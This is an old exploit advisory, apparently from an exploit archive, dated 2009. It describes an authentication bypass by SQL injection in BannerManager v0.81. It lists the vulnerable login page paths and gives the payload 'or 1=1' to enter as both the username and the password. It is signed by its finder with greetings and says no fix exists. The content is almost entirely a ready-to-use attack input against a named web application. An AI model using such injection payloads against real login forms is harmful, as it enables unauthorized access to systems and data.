BannerManager 0.81 (Auth Bypass) SQL Injection Vulnerability

2009-02-26 00:03:31

#################################################
# #
# SISTEMA DE BANNER: BannerManager v0.81 #
# http://sourceforge.net/projects/bannermanager #
# -------------------------------------- #
# vulnerable: sql injection :) #
# Found by: rootzig #
# -------------------------------------- #
#################################################
Greetz: Eviwrite :P
-------------------
-----------------------------------------

/Banner/default.asp
/[patch]/default.asp

-----------------------------------------

Login: or 1=1
Pass : or 1=1

-----------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.